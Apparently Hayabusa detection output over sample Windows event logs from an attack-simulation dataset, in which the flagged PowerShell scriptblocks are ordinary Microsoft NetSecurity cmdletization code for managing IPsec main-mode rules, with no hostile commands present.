[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Polic",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"alue = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeRule' -Alias '*' function Remove-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Polic",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"yStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeRule' -Alias '*' function Rename-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 